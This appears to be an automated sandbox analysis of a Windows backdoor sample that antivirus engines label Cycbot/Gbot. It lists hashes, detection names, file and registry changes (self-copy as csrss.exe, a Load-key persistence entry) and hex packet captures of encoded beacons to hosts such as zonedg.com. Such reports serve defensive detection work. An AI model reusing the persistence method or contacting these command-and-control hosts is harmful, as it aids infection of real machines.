Analysis Date2018-02-02 01:31:54
MD5d7fe20c2e7b76c3916876925eab1de33
SHA14d427de2d8d25fb89439bae34d327f124ac71b02

Static Details:

File typePE32 executable (GUI) Intel 80386, for MS Windows
PEhash
AVArcabit (arcavir)Error Scanning File
AVAuthentiumW32/Goolbot.H.gen!Eldorado
AVGrisoft (avg)Win32/Cryptor
AVAvira (antivir)TR/Kazy.20655.52
AVAlwil (avast)Cybota [Trj]
AVAd-AwareGen:Trojan.Heur.KS.1
AVBitDefenderGen:Trojan.Heur.KS.1
AVBullGuardError Scanning File
AVClamAVWin.Trojan.Gbot-695
AVDr. WebTrojan.DownLoader2.42692
AVEmsisoftGen:Trojan.Heur.KS.1
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Gen:Trojan.Heur.KS.1
AVFortinetW32/Gbot.B!tr.bdr
AVFrisk (f-prot)W32/Goolbot.H.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVIkarusError Scanning File
AVK7Error Scanning File
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesNo Virus
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVNANOTrojan.Win32.Dwn.csbyu
AVEset (nod32)Win32/Kryptik.MVJ
AVPadvishMalware.Trojan.Gbot-692
AVCAT (quickheal)Backdoor.Cycbot.B
AVRisingTrojan.Win32.Fednu.fnh
AV360 SafeNo Virus
AVSUPERAntiSpywareTrojan.Agent/Gen-FakeAlert
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMA
AVTwisterNo Virus
AVVirusBlokAda (vba32)Trojan.Gbot
AVWindows DefenderBackdoor:Win32/Cycbot.G
AVZillya!No Virus

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\THX1138\AppData\Local\Temp\4d427de2d8d25fb89439bae34d327f124ac71b02.exe

Creates MutexRasPbFile
Creates Mutex{5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates FileC:\Users\THX1138\AppData\Local\Temp\4d427de2d8d25fb89439bae34d327f124ac71b02.exe
Creates FileC:\Users\THX1138\AppData\Local\Temp\csrss.exe
Creates File\??\{4004DF22-3C28-49ED-A75F-4B403A9A222A}
Creates File\??\{4004DF22-3C28-49ED-A75F-4B403A9A222A}
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
Creates FileC:\Users\THX1138\AppData\Roaming\02A6.03E
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Users\THX1138\AppData\Local\Temp\csrss.exe
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\EnableFileTracing ➝
0
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\EnableConsoleTracing ➝
0
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\FileTracingMask ➝
4294901760
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\ConsoleTracingMask ➝
4294901760
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\MaxFileSize ➝
1048576
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\4d427de2d8d25fb89439bae34d327f124ac71b02_RASMANCS\FileDirectory ➝
%windir%\tracing

Process
↳ C:\Users\THX1138\AppData\Local\Temp\4d427de2d8d25fb89439bae34d327f124ac71b02.exe

Creates MutexRasPbFile
Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates File\??\{4004DF22-3C28-49ED-A75F-4B403A9A222A}
Creates File\??\{4004DF22-3C28-49ED-A75F-4B403A9A222A}

Process
↳ C:\Users\THX1138\AppData\Local\Temp\4d427de2d8d25fb89439bae34d327f124ac71b02.exe

Creates MutexRasPbFile
Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6b5825 32425039 68253242 49307344   NkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69776f32 4c324755 72302532   kX9Piwo2L2GUr0%2
0x00000050 (00080)   42624773 63665274 58253242 61497772   BbGscfRtX%2BaIwr
0x00000060 (00096)   35316757 31663434 37447258 66316555   51gW1f447DrXf1eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 686d5249 6c503747 33334b43   0agDhmRIlP7G33KC
0x00000090 (00144)   5a55726c 3873536f 41765275 4f253242   ZUrl8sSoAvRuO%2B
0x000000a0 (00160)   66757871 30307344 304f704c 6a527141   fuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a                  close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6b5825 32425039 68253242 49307344   NkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69776f32 4c324755 72302532   kX9Piwo2L2GUr0%2
0x00000050 (00080)   42624773 63665274 58253242 61497772   BbGscfRtX%2BaIwr
0x00000060 (00096)   35316757 31663434 37447258 66316555   51gW1f447DrXf1eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 686d5249 6c503747 33334b43   0agDhmRIlP7G33KC
0x00000090 (00144)   5a55726c 3873536f 41765275 4f253242   ZUrl8sSoAvRuO%2B
0x000000a0 (00160)   66757871 30307344 304f704c 6a527141   fuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a                  ose......

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6b5825 32425039 68253242 49307344   NkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69776f32 4c324755 72302532   kX9Piwo2L2GUr0%2
0x00000050 (00080)   42624773 63665274 58253242 61497772   BbGscfRtX%2BaIwr
0x00000060 (00096)   35316757 31663434 37447258 66316555   51gW1f447DrXf1eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 686d5249 6c503747 33334b43   0agDhmRIlP7G33KC
0x00000090 (00144)   5a55726c 3873536f 41765275 4f253242   ZUrl8sSoAvRuO%2B
0x000000a0 (00160)   66757871 30307344 304f704c 6a527141   fuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a672532 42386170 59764561   OhLgjg%2B8apYvEa
0x000000c0 (00192)   53765425 32427371 70303457 6b383425   SvT%2Bsqp04Wk84%
0x000000d0 (00208)   32467243 766e4b43 62464b76 39373558   2FrCvnKCbFKv975X
0x000000e0 (00224)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000f0 (00240)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000100 (00256)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000110 (00272)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000120 (00288)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000130 (00304)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000140 (00320)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000150 (00336)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000160 (00352)   636c6f73 650d0a0d 0a                  close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6b5825 32425039 68253242 49307344   NkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69776f32 4c324755 72302532   kX9Piwo2L2GUr0%2
0x00000050 (00080)   42624773 63665274 58253242 61497772   BbGscfRtX%2BaIwr
0x00000060 (00096)   35316757 31663434 37447258 66316555   51gW1f447DrXf1eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 686d5249 6c503747 33334b43   0agDhmRIlP7G33KC
0x00000090 (00144)   5a55726c 3873536f 41765275 4f253242   ZUrl8sSoAvRuO%2B
0x000000a0 (00160)   66757871 30307344 304f704c 6a527141   fuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a6e 65637469 6f6e3a20   ose....nection: 
0x00000160 (00352)   636c6f73 650d0a0d 0a                  close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6b5825 32425039 68253242 49307344   NkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69776f32 4c324755 72302532   kX9Piwo2L2GUr0%2
0x00000050 (00080)   42624773 63665274 58253242 61497772   BbGscfRtX%2BaIwr
0x00000060 (00096)   35316757 31663434 37447258 66316555   51gW1f447DrXf1eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 686d5249 6c503747 33334b43   0agDhmRIlP7G33KC
0x00000090 (00144)   5a55726c 3873536f 41765275 4f253242   ZUrl8sSoAvRuO%2B
0x000000a0 (00160)   66757871 30307344 304f704c 6a527141   fuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a637469 6f6e3a20   close....ction: 
0x00000160 (00352)   636c6f73 650d0a0d 0a                  close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6b5825 32425039 68253242 49307344   NkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69776f32 4c324755 72302532   kX9Piwo2L2GUr0%2
0x00000050 (00080)   42624773 63665274 58253242 61497772   BbGscfRtX%2BaIwr
0x00000060 (00096)   35316757 31663434 37447258 66316555   51gW1f447DrXf1eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 686d5249 6c503747 33334b43   0agDhmRIlP7G33KC
0x00000090 (00144)   5a55726c 3873536f 41765275 4f253242   ZUrl8sSoAvRuO%2B
0x000000a0 (00160)   66757871 30307344 304f704c 6a527141   fuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a672532 42386170 59764561   OhLgjg%2B8apYvEa
0x000000c0 (00192)   53253246 54253242 73717030 34576b38   S%2FT%2Bsqp04Wk8
0x000000d0 (00208)   34253246 7243766e 4b436246 4b763937   4%2FrCvnKCbFKv97
0x000000e0 (00224)   35586c6d 35472048 5454502f 312e310d   5Xlm5G HTTP/1.1.
0x000000f0 (00240)   0a486f73 743a207a 6f6e6564 672e636f   .Host: zonedg.co
0x00000100 (00256)   6d0d0a55 7365722d 4167656e 743a204d   m..User-Agent: M
0x00000110 (00272)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000120 (00288)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000130 (00304)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000140 (00320)   290d0a43 6f6e7465 6e742d4c 656e6774   )..Content-Lengt
0x00000150 (00336)   683a2030 0d0a436f 6e6e6563 74696f6e   h: 0..Connection
0x00000160 (00352)   3a20636c 6f73650d 0a0d0a              : close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e6b5825 32425039 68253242 49307344   NkX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69776f32 4c324755 72302532   kX9Piwo2L2GUr0%2
0x00000050 (00080)   42624773 63665274 58253242 61497772   BbGscfRtX%2BaIwr
0x00000060 (00096)   35316757 31663434 37447258 66316555   51gW1f447DrXf1eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 686d5249 6c503747 33334b43   0agDhmRIlP7G33KC
0x00000090 (00144)   5a55726c 3873536f 41765275 4f253242   ZUrl8sSoAvRuO%2B
0x000000a0 (00160)   66757871 30307344 304f704c 6a527141   fuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a755825 3242534e 784c3579 676d3143   JuX%2BSNxL5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a20636c 6f73650d 0a0d0a              . close....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7632 333d3531   /3521.jpg?v23=51
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42764571   qxG1J42pzMffBvEq
0x00000040 (00064)   334f6a62 77766753 39313756 3635724a   3OjbwvgS917V65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   6e657777 6f726c64 6469736f 72646572   newworlddisorder
0x00000090 (00144)   76696465 6f2e636f 6d0d0a41 63636570   video.com..Accep
0x000000a0 (00160)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x000000b0 (00176)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x000000c0 (00192)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f57696e 646f7773 4c697665   GET /WindowsLive
0x00000010 (00016)   57726974 65722f77 65622d32 5f305f74   Writer/web-2_0_t
0x00000020 (00032)   68756d62 5f312e67 69663f76 39333d32   humb_1.gif?v93=2
0x00000030 (00048)   33267471 3d67485a 75744479 4d763572   3&tq=gHZutDyMv5r
0x00000040 (00064)   4a655462 6961396e 726d736c 36676957   JeTbia9nrmsl6giW
0x00000050 (00080)   7a253242 4a5a6256 79412533 44204854   z%2BJZbVyA%3D HT
0x00000060 (00096)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000070 (00112)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000080 (00128)   20726561 6c736f66 74776172 65646576    realsoftwaredev
0x00000090 (00144)   656c6f70 6d656e74 2e636f6d 0d0a4163   elopment.com..Ac
0x000000a0 (00160)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000b0 (00176)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x000000c0 (00192)   2e300d0a 0d0a                         .0....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7635 363d3331   /3521.jpg?v56=31
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42764571   qxG1J42pzMffBvEq
0x00000040 (00064)   334f6a62 77766753 39313757 3635724a   3OjbwvgS917W65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   31323233 34333233 342e6d6f 746f7374   122343234.motost
0x00000090 (00144)   796c6563 6c75622e 636f6d0d 0a416363   yleclub.com..Acc
0x000000a0 (00160)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000b0 (00176)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x000000c0 (00192)   300d0a0d 0a42534e 78564b76 39373558   0....BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a637469 6f6e3a20   close....ction: 
0x00000160 (00352)   636c6f73 650d0a0d 0a                  close....


Strings